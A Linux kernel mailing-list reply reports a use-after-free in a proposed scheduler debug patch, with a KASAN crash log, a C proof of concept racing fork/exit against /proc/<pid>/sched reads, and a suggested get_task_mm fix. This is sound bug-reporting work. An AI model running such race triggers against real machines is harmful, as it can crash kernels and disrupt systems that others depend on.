Re: [RFC PATCH 8/8] sched/debug: Print task preferred LLC for scheduler debugging

From: XIAO WU

Date: Sun Jun 28 2026 - 15:29:43 EST


Hi Jianyong,

I came across the Sashiko AI review of this series and reproduced the
use-after-free it flagged in sched_show_cache() — a KASAN
slab-use-after-free triggers when reading /proc/<pid>/sched while the
target task is concurrently exiting.

The Sashiko review is at:
https://sashiko.dev/#/patchset/20260625030759.25928-1-wujianyong@xxxxxxxx

> +static void sched_show_cache(struct task_struct *p, struct seq_file *m)
> +{
> +#ifdef CONFIG_SCHED_CACHE
> +    struct mm_struct *mm = p->mm;
> +    int sc_cpu, sc_llc, sc_node, pref_llc, pref_node;
> +
> +    if (!mm)
> +        return;
> +
> +    sc_cpu = READ_ONCE(mm->sc_stat.cpu);

This saves p->mm into a local variable and checks it for NULL, but
does so without holding task_lock(p) or taking a reference via
get_task_mm().  If the target task is concurrently exiting,
exit_mm() can drop the final reference and free the mm_struct
between the NULL check and the READ_ONCE(mm->sc_stat.cpu) access,
resulting in a slab-use-after-free.

The access happens from proc_sched_show_task() which is reachable
via /proc/<pid>/sched — userspace can trigger this for any visible
task by simply reading the proc file while the task exits.

=== Reproduction ===

Kernel: 7.1.0-rc2-gd93b88951718 #1 PREEMPT(full)
Arch:   x86_64 (QEMU Standard PC Q35 + ICH9, 2009)
Config: CONFIG_KASAN=y, CONFIG_SCHED_CACHE=y

Trigger: race fork/exit against /proc/<pid>/sched reads.  16 worker
threads each fork children and read /proc/<child_pid>/sched while
the child immediately exits.

=== Crash Log ===

[  991.032119][T535366] BUG: KASAN: slab-use-after-free in proc_sched_show_task+0x30c7/0x3470
[  991.032971][T535366] Read of size 4 at addr ffff88802fe0d960 by task poc/535366
[  991.033952][T535366] CPU: 1 UID: 0 PID: 535366 Comm: poc Not tainted 7.1.0-rc2-gd93b88951718 #1 PREEMPT(full)
[  991.033962][T535366] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009)
[  991.033967][T535366] Call Trace:
[  991.033970][T535366]  <TASK>
[  991.033973][T535366]  dump_stack_lvl+0x116/0x1f0
[  991.033989][T535366]  print_report+0xf4/0x600
[  991.034021][T535366]  kasan_report+0xe0/0x110
[  991.034032][T535366]  ? proc_sched_show_task+0x30c7/0x3470
[  991.034043][T535366]  proc_sched_show_task+0x30c7/0x3470
[  991.034054][T535366]  sched_show+0xf4/0x1b0
[  991.034062][T535366]  seq_read_iter+0x513/0x12d0
[  991.034074][T535366]  seq_read+0x3b1/0x590
[  991.034093][T535366]  vfs_read+0x1e9/0xd00
[  991.034153][T535366]  ksys_read+0x12f/0x250
[  991.034220][T535366]  do_syscall_64+0x129/0x880
[  991.034240][T535366]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[  991.034250][T535366]  </TASK>

The Read of size 4 at an offset into a freed mm_struct matches the
READ_ONCE(mm->sc_stat.cpu) access racing against exit_mm().

=== PoC ===

Build:  gcc -o poc poc.c -static
Run:    ./poc

/* sched_show_cache UAF PoC — race fork/exit against /proc/<pid>/sched */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/wait.h>

static void worker(void)
{
    char buf[64], path[64];
    for (int i = 0; i < 50000000; i++) {
        pid_t pid = fork();
        if (pid == 0) { _exit(0); }
        if (pid > 0) {
            snprintf(path, 64, "/proc/%d/sched", pid);
            int fd = open(path, O_RDONLY);
            if (fd >= 0) { read(fd, buf, 63); close(fd); }
        }
    }
    _exit(0);
}

int main(void)
{
    signal(SIGCHLD, SIG_IGN);
    for (int i = 0; i < 16; i++)
        if (fork() == 0) { worker(); }
    while (wait(NULL) > 0);
    return 0;
}

The fix is to use get_task_mm(p) / mmput(mm) around the mm access,
which safely pins the mm_struct for the duration of the read.

Thanks,
Xiao